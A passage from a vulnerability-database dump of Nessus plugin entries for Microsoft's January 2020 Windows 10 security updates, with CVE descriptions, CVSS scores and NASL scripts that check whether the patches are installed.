(CVE-2020-0608)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Virtual PCI on a host server fails to properly\n validate input from a privileged user on a guest\n operating system. (CVE-2020-0617)\n\n - A security feature bypass vulnerability exists in\n Windows 10 when third party filters are called during a\n password update. Successful exploitation of the\n vulnerability could allow a user to make use of a\n blocked password for their account. 
(CVE-2020-0621)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0622)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. 
(CVE-2020-0613, CVE-2020-0614,\n CVE-2020-0623, CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632,\n CVE-2020-0633)\n\n - An elevation of privilege vulnerability exists in the\n way the Update Notification Manager handles files.\n (CVE-2020-0638)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. 
An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0644)\n\n - A spoofing vulnerability exists in the way Windows\n CryptoAPI (Crypt32.dll) validates Elliptic Curve\n Cryptography (ECC) certificates. An attacker could\n exploit the vulnerability by using a spoofed code-\n signing certificate to sign a malicious executable,\n making it appear the file was from a trusted, legitimate\n source. The user would have no way of knowing the file\n was malicious, because the digital signature would\n appear to be from a trusted provider. A successful\n exploit could also allow the attacker to conduct man-in-\n the-middle attacks and decrypt confidential information\n on user connections to the affected software. The\n security update addresses the vulnerability by ensuring\n that Windows CryptoAPI completely validates ECC\n certificates. 
(CVE-2020-0601)\");\n # https://support.microsoft.com/en-us/help/4534276/windows-10-update-kb4534276\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3c9c3e46\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4534276.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-01\";\nkbs = make_list('4534276');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nmy_os_build = get_kb_item(\"SMB/WindowsVersionBuild\");\nproductname = get_kb_item_or_exit(\"SMB/ProductName\");\n\nif (my_os_build = \"16299\" && \"enterprise\" >!< tolower(productname) && \"education\" >!< tolower(productname) && \"server\" >!< tolower(productname))\n audit(AUDIT_OS_NOT, \"a supported version of Windows\");\n\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"16299\",\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4534276])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-27T10:29:16", "description": "The remote Windows host is missing security update 4534293.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure 
vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the user's\n system. (CVE-2020-0608)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Virtual PCI on a host server fails to properly\n validate input from a privileged user on a guest\n operating system. 
(CVE-2020-0617)\n\n - A security feature bypass vulnerability exists in\n Windows 10 when third party filters are called during a\n password update. Successful exploitation of the\n vulnerability could allow a user to make use of a\n blocked password for their account. (CVE-2020-0621)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the user's system. (CVE-2020-0622)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. 
(CVE-2020-0613, CVE-2020-0614,\n CVE-2020-0623, CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632,\n CVE-2020-0633)\n\n - An elevation of privilege vulnerability exists in the\n way the Update Notification Manager handles files.\n (CVE-2020-0638)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. 
An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0644)\n\n - A spoofing vulnerability exists in the way Windows\n CryptoAPI (Crypt32.dll) validates Elliptic Curve\n Cryptography (ECC) certificates. An attacker could\n exploit the vulnerability by using a spoofed code-\n signing certificate to sign a malicious executable,\n making it appear the file was from a trusted, legitimate\n source. The user would have no way of knowing the file\n was malicious, because the digital signature would\n appear to be from a trusted provider. A successful\n exploit could also allow the attacker to conduct man-in-\n the-middle attacks and decrypt confidential information\n on user connections to the affected software. The\n security update addresses the vulnerability by ensuring\n that Windows CryptoAPI completely validates ECC\n certificates. 
(CVE-2020-0601)", "edition": 9, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-14T00:00:00", "title": "KB4534293: Windows 10 Version 1803 January 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0621", "CVE-2020-0638", "CVE-2020-0622", "CVE-2020-0643", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0617", "CVE-2020-0627", "CVE-2020-0630", "CVE-2020-0644", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0623", "CVE-2020-0628", "CVE-2020-0642", "CVE-2020-0646", "CVE-2020-0613", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0641", "CVE-2020-0635", "CVE-2020-0607", "CVE-2020-0633", "CVE-2020-0629", "CVE-2020-0640", "CVE-2020-0639", "CVE-2020-0611", "CVE-2020-0620", "CVE-2020-0631", "CVE-2020-0606", "CVE-2020-0601", "CVE-2020-0605", "CVE-2020-0608"], "modified": "2020-01-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JAN_4534293.NASL", "href": "https://www.tenable.com/plugins/nessus/132862", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132862);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/26\");\n\n script_cve_id(\n \"CVE-2020-0601\",\n \"CVE-2020-0605\",\n \"CVE-2020-0606\",\n \"CVE-2020-0607\",\n \"CVE-2020-0608\",\n \"CVE-2020-0611\",\n \"CVE-2020-0613\",\n \"CVE-2020-0614\",\n \"CVE-2020-0615\",\n \"CVE-2020-0617\",\n \"CVE-2020-0620\",\n \"CVE-2020-0621\",\n \"CVE-2020-0622\",\n \"CVE-2020-0623\",\n \"CVE-2020-0625\",\n \"CVE-2020-0626\",\n \"CVE-2020-0627\",\n \"CVE-2020-0628\",\n \"CVE-2020-0629\",\n \"CVE-2020-0630\",\n \"CVE-2020-0631\",\n \"CVE-2020-0632\",\n \"CVE-2020-0633\",\n \"CVE-2020-0634\",\n \"CVE-2020-0635\",\n \"CVE-2020-0638\",\n \"CVE-2020-0639\",\n \"CVE-2020-0640\",\n \"CVE-2020-0641\",\n \"CVE-2020-0642\",\n \"CVE-2020-0643\",\n \"CVE-2020-0644\",\n \"CVE-2020-0646\"\n );\n script_xref(name:\"MSKB\", value:\"4534293\");\n script_xref(name:\"MSFT\", value:\"MS20-4534293\");\n script_xref(name:\"IAVA\", value:\"2020-A-0010\");\n\n script_name(english:\"KB4534293: Windows 10 Version 1803 January 2020 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4534293.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. 
(CVE-2020-0608)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Virtual PCI on a host server fails to properly\n validate input from a privileged user on a guest\n operating system. (CVE-2020-0617)\n\n - A security feature bypass vulnerability exists in\n Windows 10 when third party filters are called during a\n password update. Successful exploitation of the\n vulnerability could allow a user to make use of a\n blocked password for their account. 
(CVE-2020-0621)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0622)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. 
(CVE-2020-0613, CVE-2020-0614,\n CVE-2020-0623, CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632,\n CVE-2020-0633)\n\n - An elevation of privilege vulnerability exists in the\n way the Update Notification Manager handles files.\n (CVE-2020-0638)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. 
An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0644)\n\n - A spoofing vulnerability exists in the way Windows\n CryptoAPI (Crypt32.dll) validates Elliptic Curve\n Cryptography (ECC) certificates. An attacker could\n exploit the vulnerability by using a spoofed code-\n signing certificate to sign a malicious executable,\n making it appear the file was from a trusted, legitimate\n source. The user would have no way of knowing the file\n was malicious, because the digital signature would\n appear to be from a trusted provider. A successful\n exploit could also allow the attacker to conduct man-in-\n the-middle attacks and decrypt confidential information\n on user connections to the affected software. The\n security update addresses the vulnerability by ensuring\n that Windows CryptoAPI completely validates ECC\n certificates. 
(CVE-2020-0601)\");\n # https://support.microsoft.com/en-us/help/4534293/windows-10-update-kb4534293\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56c0e39b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4534293.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-01\";\nkbs = make_list('4534293');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17134\",\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4534293])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-27T10:29:15", "description": "The remote Windows host is missing security update 4528760.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Subsystem for Linux handles files.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated privileges.\n (CVE-2020-0636)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle 
objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0624, CVE-2020-0642)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A spoofing vulnerability exists in the way Windows\n CryptoAPI (Crypt32.dll) validates Elliptic Curve\n Cryptography (ECC) certificates. An attacker could\n exploit the vulnerability by using a spoofed code-\n signing certificate to sign a malicious executable,\n making it appear the file was from a trusted, legitimate\n source. The user would have no way of knowing the file\n was malicious, because the digital signature would\n appear to be from a trusted provider. 
A successful\n exploit could also allow the attacker to conduct man-in-\n the-middle attacks and decrypt confidential information\n on user connections to the affected software. The\n security update addresses the vulnerability by ensuring\n that Windows CryptoAPI completely validates ECC\n certificates. (CVE-2020-0601)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the user's\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. 
(CVE-2020-0613, CVE-2020-0614,\n CVE-2020-0623, CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632,\n CVE-2020-0633)\n\n - An elevation of privilege vulnerability exists in the\n way the Update Notification Manager handles files.\n (CVE-2020-0638)\n\n - A denial of service vulnerability exists when Windows\n improperly handles hard links. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-0616)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET 